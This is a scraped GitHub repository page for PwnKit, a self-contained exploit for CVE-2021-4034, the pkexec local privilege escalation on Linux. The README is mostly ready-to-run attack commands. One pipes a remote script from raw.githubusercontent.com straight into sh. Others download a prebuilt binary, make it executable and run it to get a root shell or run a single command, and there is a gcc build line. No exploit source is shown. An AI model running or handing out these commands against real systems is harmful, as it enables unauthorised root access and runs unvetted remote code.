fjpereny / PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Usage

Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

Manually

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

Patched

Running the exploit against patched versions will yield the following output.

Build

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

Technical Details

References

About

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

License:MIT License


Languages

Language:C 95.3%Language:Shell 4.7%